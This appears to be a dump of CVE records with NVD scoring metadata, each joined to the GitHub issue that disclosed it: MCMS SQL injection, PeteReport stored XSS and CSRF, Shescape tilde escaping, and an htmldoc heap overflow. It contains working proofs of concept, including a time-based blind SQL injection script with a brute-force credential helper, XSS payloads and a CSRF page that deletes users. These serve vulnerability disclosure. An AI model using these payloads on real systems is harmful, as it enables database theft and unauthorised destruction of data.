As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run <img width="949" alt="image" src="https://user-images.githubusercontent.com/47287118/150349256-f4d140be-c973-468c-9239-384309afd3a7.png"> Look up for `filed` and find the incoming parameter <img width="953" alt="image" src="https://user-images.githubusercontent.com/47287118/150349300-0c8c74b0-2734-469d-a0ce-ce9f032942e6.png"> Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain <img width="839" alt="image" src="https://user-images.githubusercontent.com/47287118/150349351-25462576-50c7-45cd-ba3f-042780675506.png"> <img width="952" alt="image" src="https://user-images.githubusercontent.com/47287118/150349378-395bca53-008d-4505-9431-5c4031426ecc.png"> Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain <img width="952" alt="image" src="https://user-images.githubusercontent.com/47287118/150349446-eaa05c3e-09c3-4e7d-9722-329385cba00b.png"> <img width="955" alt="image" src="https://user-images.githubusercontent.com/47287118/150349472-93194e44-127d-4934-88bd-4bdb6b856e6c.png"> --- This block was found to have database calls <img width="955" alt="image" src="https://user-images.githubusercontent.com/47287118/150349523-43f20a16-e97a-46ff-b03e-a8ced1609962.png"> Next we try to inject, see the file `net/mingsoft/cms/action/web/MCmsAction.java` at the top of the class definition, you can know the route is `host:port/mcms`, and then add the method to be called, you can get the route is `host:port/mcms/ search.do`, next try to inject ``` GET /mcms/search.do?1'=0000 HTTP/1.1 User-Agent: PostmanRuntime/7.29.0 Accept: */* Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08 Host: localhost:8080 Accept-Encoding: gzip, deflate Connection: close Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4 ``` <img width="949" alt="image" src="https://user-images.githubusercontent.com/47287118/150349694-eb30229e-4606-407d-a3dd-d5a196be76c0.png"> --- Next I wrote a py file for convenient validation, using delayed injection ``` """ {0}:要查的东西 {1}:起始位置 {2}:长度 {3}:猜测的值 """ host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000" def a(): with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames: with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds: with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file: data1 = usernames.read().splitlines() data2 = pwds.read().splitlines() for username in data1: for pwd in data2: str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8")) # str += "\n" file.write(str.decode("utf-8")) def timeout(url): try: rsp = requests.get(url, timeout=3) return rsp.text except Exception: return "timeout" def guess_length(target): for i in range(1, 100): url = host.format(target,1,1,i) rsp = timeout(url) if "timeout" in rsp: print("库长:" + chr(i) ) return int(chr(i)) def guess_char(tar,len): for i in range(0,len+1): for j in range(47, 123): url = host.format(tar,i,1,"'{0}'".format(j)) rsp = timeout(url) if "timeout" in rsp: print(chr(j)) def b(tar): length = guess_length(tar) guess_char("database()",length) b("length(database())") ```
MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI
https://api.github.com/repos/ming-soft/MCMS/issues/63/comments
1
2022-01-20T13:42:42Z
2022-09-09T01:42:59Z
https://github.com/ming-soft/MCMS/issues/63
1,109,318,365
63
3,286
CVE-2022-23051
2022-03-03T22:15:08.720
PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code while adding an 'Attack Tree' by modifying the 'svg_file' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/brown/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/brown/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/1modm/petereport/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. We will assign the cve id CVE-2022-23051 to this issue but the information will be released after the vulnerability is patched. Attached below are the links to our responsible disclosure policy. - https://fluidattacks.com/advisories/policy # Bug description PeteReport **Version 0.5** allows an authenticated admin user to inject persistent javascript code while adding an 'Attack Tree' by modifying the svg_file parameter. ## CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N ## CVSSv3 Base Score: 4.8 ## Steps to reproduce 1. Create a new Report. 2. Create a new Finding for the Report. 3. Go to 'Reports' > 'All Reports'. 4. Click on 'View' in the last created record. 5. Go to 'Attack Trees'. 6. Click on 'Add Attack Tree'. 7. Select your Finding and click on 'Save and Finish' 8. Intercept the request and insert javascript code inside the svg_file parameter. ```javascript <script type="text/javascript"> alert("XSS"); </script> ``` 9. If a user visits the attack tree the javascript code will be rendered. ## Screenshots and files ![xss_attack_tree](https://user-images.githubusercontent.com/17485471/153053130-f07789ea-18e5-4c88-81b7-5a2084bc2adb.gif) ![xss](https://user-images.githubusercontent.com/17485471/153053145-c33726de-b234-4a7e-9d2b-8f014de4be3a.png) ## System Information * Version: PeteReport Version 0.5. * Operating System: Docker. * Web Server: nginx.
Security Issue - Stored XSS (Attack Tree)
https://api.github.com/repos/1modm/petereport/issues/36/comments
1
2022-02-08T18:57:55Z
2022-02-08T21:27:49Z
https://github.com/1modm/petereport/issues/36
1,127,640,620
36
3,287
CVE-2022-23052
2022-03-03T22:15:08.760
PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings on the application.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/jett/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/jett/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/1modm/petereport/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. Attached below are the links to our responsible disclosure policy. - https://fluidattacks.com/advisories/policy # Bug description PeteReport **Version 0.5** contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application. ## CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N ## CVSSv3 Base Score: 4.3 ## Steps to reproduce 1. Create a malicious html file with the following content. ``` <html> <body> <script>history.pushState('', '', '/')</script> <!--Change ID --> <form action="https://127.0.0.1/configuration/user/delete/:id"> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 2. If an authenticated admin visits the malicious url, the user with the correspond id will be deleted ## Screenshots and files ![evidence](https://user-images.githubusercontent.com/17485471/152864768-25b58f5a-e4ca-4136-9dbe-a220a504c26b.gif) ![delete_user_html](https://user-images.githubusercontent.com/17485471/152862747-6bd7b4e0-1911-435c-9f61-10e6de1f04f0.png) ## System Information * Version: PeteReport Version 0.5. * Operating System: Docker. * Web Server: nginx.
Security Issue - CSRF (Delete user,product,etc)
https://api.github.com/repos/1modm/petereport/issues/34/comments
2
2022-02-07T20:20:42Z
2022-02-08T18:18:09Z
https://github.com/1modm/petereport/issues/34
1,126,455,676
34
3,288
CVE-2022-24725
2022-03-03T22:15:08.950
Shescape is a shell escape package for JavaScript. An issue in versions 1.4.0 to 1.5.1 allows for exposure of the home directory on Unix systems when using Bash with the `escape` or `escapeAll` functions from the _shescape_ API with the `interpolation` option set to `true`. Other tested shells, Dash and Zsh, are not affected. Depending on how the output of _shescape_ is used, directory traversal may be possible in the application using _shescape_. The issue was patched in version 1.5.1. As a workaround, manually escape all instances of the tilde character (`~`) using `arg.replace(/~/g, "\\~")`.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.5, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/issues/169" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/pull/170" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/security/advisories/GHSA-446w-rrm4-r47f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/issues/169" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/pull/170" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ericcornelissen/shescape/security/advisories/GHSA-446w-rrm4-r47f" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shescape_project:shescape:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "300F4AA8-8F2F-4AF5-B0B3-511E231C74DE", "versionEndExcluding": "1.5.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/ericcornelissen/shescape/issues/169
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ericcornelissen", "shescape" ]
# Bug Report - **Shescape version**: `v1.5.0` - **Operating system**: Unix (Ubuntu 20.04) - **Shell**: Bash ## Description If the string `=~` appears at the end of an argument in Bash (without quoting the argument) the tilde (`~`) will be expanded to the home directory. Similarly, when `xxx:~`, `~:xxx` or `xxx:~:xxx` appears after `=` (where `xxx` can be _any_ string), the tilde (`~`) will be expanded, this even works for multiple tildes. ### Actual Behaviour When running `shescape.escape(All)` with interpolation escaping enabled the trailing `~` is not escaped and therefore expanded when the argument is used. ### Expected Behaviour When running `shescape.escape(All)` with interpolation escaping enabled the trailing `~` should be escaped to avoid it being expanded when the argument is used. ## Working Examples This category of bug was found by fuzzing, the crash results can be found here: - [fuzz-crash-ubuntu-latest-d064460acb19928e9d39d88104d3babbac73b8c3.zip](https://github.com/ericcornelissen/shescape/files/8102801/fuzz-crash-ubuntu-latest-d064460acb19928e9d39d88104d3babbac73b8c3.zip.zip) - [fuzz-crash-ubuntu-latest-3f7da262eedcbbafb9fa6c88a73f27ccad35541e.zip](https://github.com/ericcornelissen/shescape/files/8102799/fuzz-crash-ubuntu-latest-3f7da262eedcbbafb9fa6c88a73f27ccad35541e.zip) - [fuzz-crash-ubuntu-latest-d9afe26e335c8ec19274bf4a631cdce570169161.zip](https://github.com/ericcornelissen/shescape/files/8102971/fuzz-crash-ubuntu-latest-d9afe26e335c8ec19274bf4a631cdce570169161.zip) - [fuzz-crash-ubuntu-latest-71ebbf663da3b83efd509e136ab3424293fa42bd.zip](https://github.com/ericcornelissen/shescape/files/8103194/fuzz-crash-ubuntu-latest-71ebbf663da3b83efd509e136ab3424293fa42bd.zip) - [fuzz-crash-ubuntu-latest-bff706bd1435d57c3d433d63d50f7e2f7e87f4f4.zip](https://github.com/ericcornelissen/shescape/files/8104027/fuzz-crash-ubuntu-latest-bff706bd1435d57c3d433d63d50f7e2f7e87f4f4.zip) - [fuzz-crash-ubuntu-latest-50ab31df9b55f3b4953d5db689c25cdef1014e40.zip](https://github.com/ericcornelissen/shescape/files/8104056/fuzz-crash-ubuntu-latest-50ab31df9b55f3b4953d5db689c25cdef1014e40.zip) - [fuzz-crash-ubuntu-latest-18410404c15407d04365ed5149d537e6d222b172.zip](https://github.com/ericcornelissen/shescape/files/8104285/fuzz-crash-ubuntu-latest-18410404c15407d04365ed5149d537e6d222b172.zip)
String like `=~` in Bash not escaped properly by escape(All) with interpolation escaping enabled
https://api.github.com/repos/ericcornelissen/shescape/issues/169/comments
0
2022-02-19T18:00:52Z
2022-02-22T08:42:32Z
https://github.com/ericcornelissen/shescape/issues/169
1,144,808,116
169
3,289
CVE-2022-25220
2022-03-03T22:15:09.010
PeteReport Version 0.5 allows an authenticated admin user to inject persistent JavaScript code inside the markdown descriptions while creating a product, report or finding.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/armstrong/" }, { "source": "help@fluidattacks.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://fluidattacks.com/advisories/armstrong/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/1modm/petereport/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:petereport_project:petereport:0.5:*:*:*:*:*:*:*", "matchCriteriaId": "F5A2F0AB-152D-4C70-A6CD-769718A46B7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/1modm/petereport/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "1modm", "petereport" ]
Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5. Attached below are the links to our responsible disclosure policy. - https://fluidattacks.com/advisories/policy # Bug description PeteReport **Version 0.5** allows an authenticated admin user to inject persistent javascript code inside the markdown descriptions while creating a product, report or finding. ## CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N ## CVSSv3 Base Score: 4.8 ## Steps to reproduce 1. Click on 'Add Product'. 2. Insert the following PoC inside the product description. ``` [XSS](javascript:alert(1)) ``` 3. Click on 'Save Product' 4. If a user visits the product and click on the link in the description the Javascript code will be rendered. ## Screenshots and files ![xss](https://user-images.githubusercontent.com/17485471/152865439-42089079-615c-4224-ae71-3cadba163ecb.png) ![xss_template](https://user-images.githubusercontent.com/17485471/152865452-21af178e-7143-4940-a18b-d352407141cc.png) ## System Information * Version: PeteReport Version 0.5. * Operating System: Docker. * Web Server: nginx.
Security Issue -Stored XSS (markdown)
https://api.github.com/repos/1modm/petereport/issues/35/comments
2
2022-02-07T20:21:47Z
2024-06-04T10:10:58Z
https://github.com/1modm/petereport/issues/35
1,126,456,813
35
3,290
CVE-2021-26259
2022-03-03T23:15:08.033
A flaw was found in htmldoc in v1.9.12. Heap buffer overflow in render_table_row(),in ps-pdf.cxx may lead to arbitrary code execution and denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/0ddab26a542c74770317b622e985c52430092ba5" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/0ddab26a542c74770317b622e985c52430092ba5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/417" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.12:*:*:*:*:*:*:*", "matchCriteriaId": "645554AD-DA7C-4B11-864A-89F423B08291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/417
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, While fuzzing htmldoc , I found a heap-buffer-overflow in the render_table_row() ps-pdf.cxx:6123:34 - test platform htmldoc Version 1.9.12 git [master 6898d0a] OS :Ubuntu 20.04.1 LTS x86_64 kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 reproduced: htmldoc -f demo.pdf poc7.html poc(zipped for update): [poc7.zip](https://github.com/michaelrsweet/htmldoc/files/5872217/poc7.zip) ``` ================================================================= ==38248==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000002100 at pc 0x00000059260e bp 0x7fffa3362670 sp 0x7fffa3362668 READ of size 8 at 0x625000002100 thread T0 #0 0x59260d in render_table_row(hdtable_t&, tree_str***, int, unsigned char*, float, float, float, float, float*, float*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:6123:34 #1 0x588630 in parse_table(tree_str*, float, float, float, float, float*, float*, int*, int) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:7081:5 #2 0x558013 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4167:11 #3 0x556c54 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4081:9 #4 0x556c54 in parse_doc(tree_str*, float*, float*, float*, float*, float*, float*, int*, tree_str*, int*) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:4081:9 #5 0x54f90e in pspdf_export /home//htmldoc_sani/htmldoc/ps-pdf.cxx:803:3 #6 0x53c845 in main /home//htmldoc_sani/htmldoc/htmldoc.cxx:1291:3 #7 0x7f52a6b3e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41f8bd in _start (/home//htmldoc_sani/htmldoc/htmldoc+0x41f8bd) 0x625000002100 is located 32 bytes to the right of 8160-byte region [0x625000000100,0x6250000020e0) allocated by thread T0 here: #0 0x4eea4e in realloc /home/goushi/work/libfuzzer-workshop/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:165 #1 0x55d96b in check_pages(int) /home//htmldoc_sani/htmldoc/ps-pdf.cxx:8804:24 SUMMARY: AddressSanitizer: heap-buffer-overflow /home//htmldoc_sani/htmldoc/ps-pdf.cxx:6123:34 in render_table_row(hdtable_t&, tree_str***, int, unsigned char*, float, float, float, float, float*, float*, int*) Shadow bytes around the buggy address: 0x0c4a7fff83d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff83f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa =>0x0c4a7fff8420:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38248==ABORTING ``` ``` ──── source:ps-pdf.cxx+8754 ──── 8749 break; 8750 } 8751 8752 if (insert) 8753 { → 8754 if (insert->prev) 8755 insert->prev->next = r; 8756 else 8757 pages[page].start = r; 8758 8759 r->prev = insert->prev; ─ threads ──── [#0] Id 1, Name: "htmldoc", stopped 0x415e8c in new_render (), reason: SIGSEGV ── trace ──── [#0] 0x415e8c → new_render(page=0x14, type=0x2, x=0, y=-6.3660128850113321e+24, width=1.2732025770022664e+25, height=6.3660128850113321e+24, data=0x7fffffff6a40, insert=0x682881c800000000) [#1] 0x4267e2 → render_table_row(table=@0x7fffffff6d98, cells=<optimized out>, row=<optimized out>, height_var=<optimized out>, left=0, right=0, bottom=<optimized out>, top=<optimized out>, x=<optimized out>, y=<optimized out>, page=<optimized out>) [#2] 0x424519 → parse_table(t=<optimized out>, left=<optimized out>, right=<optimized out>, bottom=<optimized out>, top=<optimized out>, x=<optimized out>, y=<optimized out>, page=<optimized out>, needspace=<optimized out>) [#3] 0x4157c0 → parse_doc(t=0x918c20, left=0x7fffffffb6e8, right=0x7fffffffb6e4, bottom=0x7fffffffb6ac, top=<optimized out>, x=<optimized out>, y=0x7fffffffb674, page=0x7fffffffb684, cpara=0x917cc0, needspace=0x7fffffffb6d4) [#4] 0x414964 → parse_doc(t=0x918390, left=<optimized out>, right=<optimized out>, bottom=<optimized out>, top=0x7fffffffb69c, x=0x7fffffffb6ec, y=<optimized out>, page=<optimized out>, cpara=<optimized out>, needspace=<optimized out>) [#5] 0x414964 → parse_doc(t=0x9171d0, left=<optimized out>, right=<optimized out>, bottom=<optimized out>, top=0x7fffffffb69c, x=0x7fffffffb6ec, y=<optimized out>, page=<optimized out>, cpara=<optimized out>, needspace=<optimized out>) [#6] 0x411980 → pspdf_export(document=<optimized out>, toc=<optimized out>) [#7] 0x408e89 → main(argc=<optimized out>, argv=<optimized out>) ── ``` reporter: chiba of topsec alphalab
AddressSanitizer: heap-buffer-overflow on render_table_row() ps-pdf.cxx:6123:34
https://api.github.com/repos/michaelrsweet/htmldoc/issues/417/comments
3
2021-01-26T08:58:27Z
